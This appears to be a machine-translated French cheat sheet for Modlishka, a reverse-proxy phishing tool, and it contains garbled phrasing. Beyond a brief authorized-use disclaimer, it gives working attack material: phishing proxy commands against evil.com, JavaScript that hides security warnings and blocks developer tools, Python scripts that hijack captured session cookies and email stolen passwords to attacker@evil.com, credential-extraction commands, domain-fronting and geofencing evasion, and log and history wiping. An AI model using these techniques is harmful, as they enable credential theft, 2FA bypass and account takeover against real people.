Modlishka Inverse Proxy Phishing Tool Feuille de chaleur
Aperçu général
Modlishka est un outil avancé de phishing par proxy développé par drk1wi qui permet des attaques de phishing sophistiquées avec des capacités de contournement 2FA et le détournement de session. Il agit comme un mandataire transparent entre la victime et le site Web légitime, en saisissant des lettres de créances et des jetons de session en temps réel.
C'est pas vrai. Attention : Cet outil est destiné aux tests de pénétration autorisés et aux exercices d'équipe rouge seulement. Assurez-vous d'avoir une autorisation appropriée avant d'utiliser dans tout environnement.
Installation
Binaires précompilés
# Download latest release for Linux
wget https://github.com/drk1wi/Modlishka/releases/latest/download/Modlishka-linux-amd64
chmod +x Modlishka-linux-amd64
# Download for Windows
# Download Modlishka-windows-amd64.exe from GitHub releases
# Download for macOS
wget https://github.com/drk1wi/Modlishka/releases/latest/download/Modlishka-darwin-amd64
chmod +x Modlishka-darwin-amd64
Construire à partir de la source
# Install Go (version 1.19+)
git clone https://github.com/drk1wi/Modlishka.git
cd Modlishka
make
# Cross-compile for different platforms
make build-all
```_
### Installation Docker
```bash
# Build Docker image
git clone https://github.com/drk1wi/Modlishka.git
cd Modlishka
docker build -t modlishka .
# Run Modlishka in Docker
docker run -it -p 443:443 -p 80:80 modlishka
```_
## Utilisation de base
### Options de ligne de commande
```bash
# Basic usage
./Modlishka -target https://example.com -domain evil.com
# With SSL certificate
./Modlishka -target https://example.com -domain evil.com -cert /path/to/cert.crt -certKey /path/to/key.key
# With configuration file
./Modlishka -config config.json
# Debug mode
./Modlishka -target https://example.com -domain evil.com -debug
Fichier de configuration
\\\\{
"proxyDomain": "evil.com",
"listeningAddress": "0.0.0.0",
"target": "https://example.com",
"targetRes": "",
"targetRules": "PC9oZWFkPg==",
"terminateTriggers": "",
"terminateUrl": "",
"trackingCookie": "id",
"trackingParam": "id",
"jsRules": "",
"forceHTTPS": false,
"forceHTTP": false,
"dynamicMode": false,
"debug": false,
"logPostOnly": false,
"disableSecurity": false,
"log": "requests.log",
"plugins": "all",
"cert": "",
"certKey": "",
"certPool": ""
\\\\}
Référence de commande
Paramètres de base
| Parameter | Description |
|---|---|
-target |
Target website URL |
-domain |
Phishing domain |
-listeningAddress |
Listening IP address |
-cert |
SSL certificate file |
-certKey |
SSL private key file |
-config |
Configuration file path |
Paramètres avancés
| Parameter | Description |
|---|---|
-debug |
Enable debug mode |
-log |
Log file path |
-plugins |
Plugin configuration |
-forceHTTPS |
Force HTTPS redirects |
-dynamicMode |
Enable dynamic mode |
-disableSecurity |
Disable security headers |
Configuration avancée
Configuration SSL/TLS
# Generate self-signed certificate
openssl req -newkey rsa:4096 -nodes -keyout modlishka.key -x509 -days 365 -out modlishka.crt
# Use Let's Encrypt certificate
certbot certonly --standalone -d evil.com
./Modlishka -target https://example.com -domain evil.com -cert /etc/letsencrypt/live/evil.com/fullchain.pem -certKey /etc/letsencrypt/live/evil.com/privkey.pem
Configuration des règles cibles
\\\\{
"targetRules": "base64_encoded_rules",
"jsRules": "base64_encoded_js_rules"
\\\\}
Modification du contenu Règles
// JavaScript rules for content modification
// Base64 encode these rules for targetRules parameter
// Hide security warnings
document.querySelectorAll('.security-warning').forEach(el => el.style.display = 'none');
// Modify page title
document.title = 'Legitimate Service Login';
// Remove security indicators
document.querySelectorAll('.ssl-indicator').forEach(el => el.remove());
// Inject custom CSS
var style = document.createElement('style');
style.textContent = '.phishing-indicator \\\\{ display: none !important; \\\\}';
document.head.appendChild(style);
Configuration du plugin
\\\\{
"plugins": \\\\{
"credHarvester": \\\\{
"enabled": true,
"params": \\\\{
"log": "credentials.log",
"format": "json"
\\\\}
\\\\},
"sessionHijacker": \\\\{
"enabled": true,
"params": \\\\{
"cookieLog": "cookies.log"
\\\\}
\\\\},
"2faBypass": \\\\{
"enabled": true,
"params": \\\\{
"tokenLog": "tokens.log"
\\\\}
\\\\}
\\\\}
\\\\}
Techniques de contournement 2FA
Prise de compte de la séance
# Modlishka automatically captures session tokens
# Monitor the log file for captured sessions
tail -f requests.log|grep -i "session\|token\|cookie"
# Extract session cookies
grep -o '"cookies":\[.*\]' requests.log|jq '.cookies'
Détournement de session en temps réel
# Python script to monitor and use captured sessions
import json
import requests
import time
def monitor_sessions(log_file):
with open(log_file, 'r') as f:
f.seek(0, 2) # Go to end of file
while True:
line = f.readline()
if line:
try:
data = json.loads(line)
if 'cookies' in data:
cookies = data['cookies']
# Use captured cookies for session hijacking
hijack_session(cookies)
except:
pass
time.sleep(1)
def hijack_session(cookies):
session = requests.Session()
for cookie in cookies:
session.cookies.set(cookie['name'], cookie['value'])
# Access protected resources
response = session.get('https://example.com/dashboard')
print(f"Session hijack successful: \\\\{response.status_code\\\\}")
Dépassement de TTP/SMS
# Modlishka captures 2FA tokens in real-time
# The victim enters the 2FA code on the phishing site
# Modlishka forwards it to the legitimate site
# Session is established and captured
# Monitor 2FA bypass attempts
grep -i "2fa\|totp\|sms\|verification" requests.log
Techniques d'évacuation
Domain Fronting
# Use CDN for domain fronting
./Modlishka -target https://example.com -domain cdn.cloudflare.com -hostHeader evil.com
# Configure DNS for domain fronting
# Point evil.com to CDN IP
# Configure CDN to forward to Modlishka server
Obfuscation de la circulation
\\\\{
"userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
"customHeaders": \\\\{
"X-Forwarded-For": "192.168.1.100",
"X-Real-IP": "192.168.1.100",
"Accept-Language": "en-US,en;q=0.9"
\\\\}
\\\\}
Mesures antidétection
// Inject anti-detection JavaScript
// Disable developer tools
document.addEventListener('keydown', function(e) \\\\{
if (e.key === 'F12'||(e.ctrlKey && e.shiftKey && e.key === 'I')) \\\\{
e.preventDefault();
return false;
\\\\}
\\\\});
// Disable right-click
document.addEventListener('contextmenu', function(e) \\\\{
e.preventDefault();
return false;
\\\\});
// Clear console
setInterval(function() \\\\{
console.clear();
\\\\}, 1000);
Filtre de géolocalisation
# Python script for geolocation-based filtering
import geoip2.database
from flask import Flask, request, abort
app = Flask(__name__)
reader = geoip2.database.Reader('/path/to/GeoLite2-City.mmdb')
ALLOWED_COUNTRIES = ['US', 'CA', 'GB']
@app.before_request
def check_geolocation():
client_ip = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
try:
response = reader.city(client_ip)
country_code = response.country.iso_code
if country_code not in ALLOWED_COUNTRIES:
abort(404)
except:
# If geolocation fails, allow access
pass
Récolte crédible
Analyse du journal
# Extract credentials from logs
grep -o '"username":"[^"]*"' requests.log|cut -d'"' -f4|sort -u
grep -o '"password":"[^"]*"' requests.log|cut -d'"' -f4
# Extract email addresses
grep -oE '[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]\\\\{2,\\\\}' requests.log|sort -u
# Extract session tokens
grep -o '"sessionToken":"[^"]*"' requests.log|cut -d'"' -f4
Surveillance en temps réel
# Real-time credential monitoring
import json
import time
import smtplib
from email.mime.text import MIMEText
def monitor_credentials(log_file):
with open(log_file, 'r') as f:
f.seek(0, 2)
while True:
line = f.readline()
if line:
try:
data = json.loads(line)
if 'username' in data and 'password' in data:
send_notification(data['username'], data['password'])
except:
pass
time.sleep(1)
def send_notification(username, password):
msg = MIMEText(f"New credentials captured:\nUsername: \\\\{username\\\\}\nPassword: \\\\{password\\\\}")
msg['Subject'] = 'Modlishka - Credentials Captured'
msg['From'] = 'modlishka@evil.com'
msg['To'] = 'attacker@evil.com'
server = smtplib.SMTP('localhost')
server.send_message(msg)
server.quit()
Stockage des bases de données
# Store credentials in database
import sqlite3
import json
def store_credentials(log_file, db_file):
conn = sqlite3.connect(db_file)
cursor = conn.cursor()
# Create table
cursor.execute('''
CREATE TABLE IF NOT EXISTS credentials (
id INTEGER PRIMARY KEY,
timestamp TEXT,
username TEXT,
password TEXT,
ip_address TEXT,
user_agent TEXT
)
''')
with open(log_file, 'r') as f:
for line in f:
try:
data = json.loads(line)
if 'username' in data and 'password' in data:
cursor.execute('''
INSERT INTO credentials
(timestamp, username, password, ip_address, user_agent)
VALUES (?, ?, ?, ?, ?)
''', (
data.get('timestamp'),
data.get('username'),
data.get('password'),
data.get('ip'),
data.get('userAgent')
))
except:
pass
conn.commit()
conn.close()
Sécurité opérationnelle
Configuration des infrastructures
# Use VPS with clean IP reputation
# Implement proper DNS configuration
# Use legitimate SSL certificates
# Set up redirectors and load balancers
Gestion des journaux
# Rotate logs to prevent disk space issues
logrotate -f /etc/logrotate.d/modlishka
# Secure log storage
chmod 600 requests.log
chown root:root requests.log
# Remote log shipping
rsync -avz requests.log user@backup-server:/logs/
Procédures de nettoyage
# Secure deletion of logs
shred -vfz -n 3 requests.log
shred -vfz -n 3 credentials.log
# Clear system logs
journalctl --vacuum-time=1d
# Clear bash history
history -c
rm ~/.bash_history
Dépannage
Problèmes de connexion
# Test target connectivity
curl -I https://example.com
# Check DNS resolution
dig evil.com
nslookup evil.com
# Test SSL certificate
openssl s_client -connect evil.com:443 -servername evil.com
Problèmes SSL/TLS
# Verify certificate
openssl x509 -in modlishka.crt -text -noout
# Check certificate chain
openssl verify -CAfile ca.crt modlishka.crt
# Test SSL configuration
sslscan evil.com:443
Problèmes de performance
# Monitor resource usage
top -p $(pgrep Modlishka)
# Check network connections
netstat -tulpn|grep Modlishka
# Monitor disk usage
df -h
du -sh requests.log
Mode de débogage
# Enable debug logging
./Modlishka -target https://example.com -domain evil.com -debug
# Analyze debug output
tail -f debug.log|grep -i error
# Check for common issues
grep -i "certificate\|ssl\|tls\|dns" debug.log
Évasion de détection
Niveau réseau
- Utiliser des domaines et des certificats légitimes
- Mettre en œuvre la configuration DNS appropriée
- Utiliser CDN et fronting de domaine
- Varier les modes de circulation et le calendrier
- Mettre en œuvre un traitement approprié des erreurs
Niveau de demande
- Mimic comportement légitime site Web
- Utiliser les en-têtes HTTP et les réponses appropriées
- Mettre en œuvre des mesures anti-bots
- Utiliser des agents d'utilisation légitimes
- Manipulation des cas bord gracieusement
Comportement
- Limiter la durée de l'attaque
- Cibler des utilisateurs/organisations spécifiques
- Utiliser l'ingénierie sociale pour l'accès initial
- Mettre en œuvre des procédures de nettoyage appropriées
- Surveillance des indicateurs de détection
Ressources
- [Dépôt de Modliska GitHub] (LINK_5)
- [Documentation de Modliska] (LINK_5)
- [Blogue drk1wi] (LINK_5)
- [Techniques inverses de phishing proxy] (LINK_5)
- [Recherche de contournement 2FA] (LINK_5)
*Cette feuille de triche fournit une référence complète pour l'utilisation de Modlishka. Assurez-vous toujours d'avoir une autorisation appropriée avant d'utiliser cet outil dans n'importe quel environnement. *